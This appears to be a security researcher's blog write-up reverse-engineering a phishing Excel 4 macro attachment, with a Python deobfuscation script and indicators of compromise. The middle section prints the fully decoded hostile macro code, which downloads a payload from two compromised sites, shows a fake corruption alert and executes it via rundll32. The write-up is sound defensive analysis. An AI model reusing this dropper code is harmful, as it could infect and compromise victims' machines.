Reverse Engineering Obfuscated Excel 4 Macro Malware

An employee at First Look Media reported a phishing email to the security team that had a malicious attachment called form_199025.xls. The day the email was received, only one out of 56 anti-virus programs at VirusTotal detected it as a threat. I decided to dig into this attachment and discover what the malware does.

Screenshot of phishing email

In order to look at the document itself without risking the malware infecting my computer, I converted it to a safe PDF using Dangerzone, a new open source tool that FLM recently released that lets you open potentially malicious documents without getting hacked.

Screenshot of safe PDF generated by Dangerzone

The bait in this case is a green Microsoft Excel-themed image, disguised to look like part of Excel’s user interface, trying to entice the user to click the “Enable Editing” and “Enable Content” buttons. If the user opens the document in Excel and clicks these, it tells Excel to run the macros embedded in the document, which would then likely hack the computer.

Next, we submitted the sample document to various online malware scanners including one called IRIS-H Digital Forensics, which specializes in static analysis of document formats (see report here). Excel spreadsheets can have multiple “sheets”, and the IRIS-H analysis discovered that the .xls file contains a visible sheet called “Sheet1” (this contains the green bait image) and a hidden macro sheet called “rZVUfQRQoV”.

Screenshot from IRIS-H of the top of the hidden macro sheet

The first 78 rows and 34 columns of the macro sheet included either numbers of the string “GVK”. But beneath that, starting on row 81, you can see Excel 4 macro functions being called, but the meaning of what they do is clearly obfuscated.

Screenshot of obfuscated macro code

These functions like FORMULA, CHAR, and APP.MAXIMIZE are Excel 4 macro functions. They were included in Excel 4, but when Excel 5 came out (in 1993!) this type of macros was replaced with VBA. Still though, in 2020, Microsoft Excel supports Excel 4 macros for backwards compatibility reasons. And recently, phishers have been using this old-school type of macro for malware. This is what we’ve come across.

So, what does it do? Here is the first macro that gets executed:

FORMULA(2178/GET.CELL(17,H80)+GET.CELL(19,H80)*DAY(NOW())-10,W86)

To figure this out how this works, I found this Excel 4.0 Macro Functions Reference (pdf) and learned that:

  • The FORMULA function takes two arguments, formula_text and reference. It takes the value in formula_text and places it in the spreadsheet at the location defined by reference.
  • The GET.CELL function takes two arguments, type_num and reference. It looks at the cell defined in reference and returns a value based on what type_num is. If type_num is 17, the value is “row height of cell, in points", and if type_num is 19, the value is “size of font, in points”.
  • The NOW function returns today’s timestamp, and the DAY function takes a timestamp as an argument and returns the day of the month from it.

In other words, this macro says: “Store the following in cell W86: 2178 divided by the height of cell H80, plus the font size of cell H80 times the day of the month, minus ten.”

By loading the document in LibreOffice in a virtual machine and unhiding the macro sheet, I determined that cell H80 has a height of 24.95 points and font size of 10 points. It’s also interesting to note that this number changes depending on the day of the month. The email was sent on April 17, so the malware would only get deobfuscated correctly on the date it was sent.

So doing the math, W86 should have the value 2178 divided by 24.95 plus 10 times 17 minus 10, which equals 247.29458917835672.

The next macro that gets executed is:

APP.MAXIMIZE()

This just maximizes the Excel window. Then:

FORMULA(CHAR(A1-W86)&CHAR(A2-W86)&CHAR(A3-W86)&CHAR(A5-W86)&CHAR(A6-W86)&CHAR(A7-W86)&CHAR(A8-W86)&CHAR(A9-W86)&CHAR(A11-W86)&CHAR(A12-W86)&CHAR(A13-W86)&CHAR(A14-W86)&CHAR(A16-W86)&CHAR(A17-W86)&CHAR(A18-W86)&CHAR(A19-W86)&CHAR(A20-W86)&CHAR(A22-W86)&CHAR(A23-W86)&CHAR(A24-W86)&CHAR(A25-W86)&CHAR(A27-W86)&CHAR(A28-W86)&CHAR(A29-W86)&CHAR(A30-W86)&CHAR(A32-W86)&CHAR(A33-W86)&CHAR(A34-W86)&CHAR(A35-W86)&CHAR(A36-W86)&CHAR(A38-W86)&CHAR(A39-W86)&CHAR(A40-W86)&CHAR(A41-W86)&CHAR(A42-W86)&CHAR(A44-W86)&CHAR(A45-W86)&CHAR(A46-W86)&CHAR(A47-W86)&CHAR(A48-W86),B134)

The CHAR function converts a number into a character, using the ASCII character set. For example, CHAR(65) would return “A” and CHAR(33) would return “!”. In Excel 4 macros, the “&” character concatenates strings together.

So this macro builds a string, one character at a time, and stores it in cell B134. The first character is CHAR(A1-W86), the second character is CHAR(A2-W86), and so on. CHAR(A1-W86) means take the value in cell A1 (which is 308.12), subtract the value in cell W86 (which gets set in the first macro), and then convert that into a character.

The rest of the macros are similar. They build up a string and store it in a cell in the B column:

FORMULA(CHAR(B1-W86)&CHAR(B2-W86)&CHAR(B3-W86)&CHAR(B5-W86)&CHAR(B6-W86)&CHAR(B7-W86)&CHAR(B8-W86)&CHAR(B9-W86)&CHAR(B11-W86)&CHAR(B12-W86)&CHAR(B13-W86)&CHAR(B14-W86)&CHAR(B16-W86)&CHAR(B17-W86)&CHAR(B18-W86)&CHAR(B19-W86)&CHAR(B20-W86)&CHAR(B22-W86)&CHAR(B23-W86)&CHAR(B24-W86)&CHAR(B25-W86)&CHAR(B27-W86)&CHAR(B28-W86)&CHAR(B29-W86)&CHAR(B30-W86)&CHAR(B32-W86)&CHAR(B33-W86)&CHAR(B34-W86)&CHAR(B35-W86)&CHAR(B36-W86)&CHAR(B38-W86)&CHAR(B39-W86)&CHAR(B40-W86)&CHAR(B41-W86)&CHAR(B42-W86)&CHAR(B44-W86)&CHAR(B45-W86)&CHAR(B46-W86)&CHAR(B47-W86)&CHAR(B48-W86),B135)
FORMULA(CHAR(D1-W86)&CHAR(D2-W86)&CHAR(D3-W86)&CHAR(D5-W86)&CHAR(D6-W86)&CHAR(D7-W86)&CHAR(D8-W86)&CHAR(D9-W86)&CHAR(D11-W86)&CHAR(D12-W86)&CHAR(D13-W86)&CHAR(D14-W86)&CHAR(D16-W86)&CHAR(D17-W86)&CHAR(D18-W86)&CHAR(D19-W86)&CHAR(D20-W86)&CHAR(D22-W86)&CHAR(D23-W86)&CHAR(D24-W86)&CHAR(D25-W86)&CHAR(D27-W86)&CHAR(D28-W86)&CHAR(D29-W86)&CHAR(D30-W86)&CHAR(D32-W86)&CHAR(D33-W86)&CHAR(D34-W86)&CHAR(D35-W86)&CHAR(D36-W86)&CHAR(D38-W86)&CHAR(D39-W86)&CHAR(D40-W86)&CHAR(D41-W86)&CHAR(D42-W86),B136)
… and so on

Each character is always defined by a value in the hidden macro sheet minus the value in cell W86. So, each character is offset by the same amount, the value in W86. Also, if the number getting passed into CHAR isn’t an integer (like if it’s 65.45) it gets typecasted into an integer by chopping off the decimal (like to 65) before converting it into a character.

To deobfuscate the malware, I saved the macro sheet as a comma-separated value (CSV) file, and then I wrote a script in python.

My script first loaded the first 80 rows of the CSV and stored them in a dictionary called data, where the key is the cell reference. So data["A1"] is 308.12, data["B1"] is 320.12, etc. Then it set data["W86"] to 247.29458917835672, which was the result of that first macro.

Here is the function that does most of the magic:

def deobfuscate_formula(data, forumula_text, reference):
   text = ""
   chars = forumula_text.split("&")
   for char in chars:
       ref1, ref2 = tuple(char[5:][:-1].split("-"))
       text += chr(int(data[ref1] - data[ref2]))
   data[reference] = text
   print(text)

As arguments it takes in the data dictionary, the formula text, and the reference cell to store the value in. So if formula_text were CHAR(Q1-W86)&CHAR(Q2-W86), and reference was B146, this would figure out what those two characters were, store them in them in the cell B136, and then also print them to the terminal.

Then I tried to decode the first obfuscated string by running this:

deobfuscate_formula(
   data,
   "CHAR(A1-W86)&CHAR(A2-W86)&CHAR(A3-W86)&CHAR(A5-W86)&CHAR(A6-W86)&CHAR(A7-W86)&CHAR(A8-W86)&CHAR(A9-W86)&CHAR(A11-W86)&CHAR(A12-W86)&CHAR(A13-W86)&CHAR(A14-W86)&CHAR(A16-W86)&CHAR(A17-W86)&CHAR(A18-W86)&CHAR(A19-W86)&CHAR(A20-W86)&CHAR(A22-W86)&CHAR(A23-W86)&CHAR(A24-W86)&CHAR(A25-W86)&CHAR(A27-W86)&CHAR(A28-W86)&CHAR(A29-W86)&CHAR(A30-W86)&CHAR(A32-W86)&CHAR(A33-W86)&CHAR(A34-W86)&CHAR(A35-W86)&CHAR(A36-W86)&CHAR(A38-W86)&CHAR(A39-W86)&CHAR(A40-W86)&CHAR(A41-W86)&CHAR(A42-W86)&CHAR(A44-W86)&CHAR(A45-W86)&CHAR(A46-W86)&CHAR(A47-W86)&CHAR(A48-W86)",
   "B134",
)

This is the value that first macro puts in cell B134:

=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)

Adding the remaining FORMULA functions from the hidden macro sheet to my script reveals the complete obfuscated code:

=IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),)
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE))
="C:\Users\Public\"&RANDBETWEEN(1,9999)&".reg"
="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y"
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5)
=WAIT(NOW()+"00:00:03")
=FOPEN(R[-4]C)
=FPOS(R[-1]C,215)
=FREAD(R[-2]C,255)
=FCLOSE(R[-3]C)
=FILE.DELETE(R[-8]C)
=IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),)
="C:\Users\Public\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr"
="http://rksinha.com/wp-content/themes/calliope/wp-front.php"
="http://salamdrug.com/wp-content/themes/calliope/wp-front.php"
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0)
=ERROR(FALSE)
=FOPEN(R[-5]C,2)
=IF(ISERROR(R[-1]C),,GOTO(R[2]C))
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-5]C,R[-7]C,0,0)
=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-9]C&",DllRegisterServer",0,5)
=CLOSE(FALSE)

The last macro in the hidden macro sheet was GOTO(B134), which is the cell that the deobfuscated code started getting written to. In other words, the macros you can see in the hidden macro sheet wrote out all of the above macros into cells, and then executed them.

Here is a rough breakdown of what these malicious macros do (this write-up about similar but less obfuscated malware was helpful in understanding the Windows registry bits):

  • Check to make sure this is Excel in Windows, and if not quit
  • Download the Excel security key from the Windows registry and checks to see if the “enable all macros” setting is set, and if not quits
  • Tries downloading an executable file from one of two URLs, both of which appear to be hacked Wordpress sites (the URLhaus database lists these URLs under the “zloader” tag)
  • Pops up a warning that says, “The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt” (it’s not corrupt, this is subterfuge)
  • Executes the malicious file that was downloaded, and quits

By the time I did this analysis, the malware was gone from both apparently-hacked Wordpress sites, so I don’t have any way to know what it was supposed to do beyond that -- it could have been a remote access tool allowing the attacker to access the computer at a later point, or it could have been ransomware, or any number of other payloads. (Also, the obfuscated code only successfully decodes if you’re running this on the 17th of the month.)

We found a similar .xls malware sample uploaded to another malware analysis site, Joe Sandbox, which ran the malware in a Windows sandbox and provided lots of details, including screenshots.

Screenshot from Joe Sandbox of a similar malicious Excel document, with the macros getting executed

Indicators of Compromise

Malicious document:

  • Filename: form_199025.xls
  • SHA256 checksum: 5ce02347e90776f6a3e3142e9e01b1570c8234e702ac796104a08e5c3bb68cf9

Malware URLs:

  • http://rksinha[.]com/wp-content/themes/calliope/wp-front.php
  • http://salamdrug[.]com/wp-content/themes/calliope/wp-front.php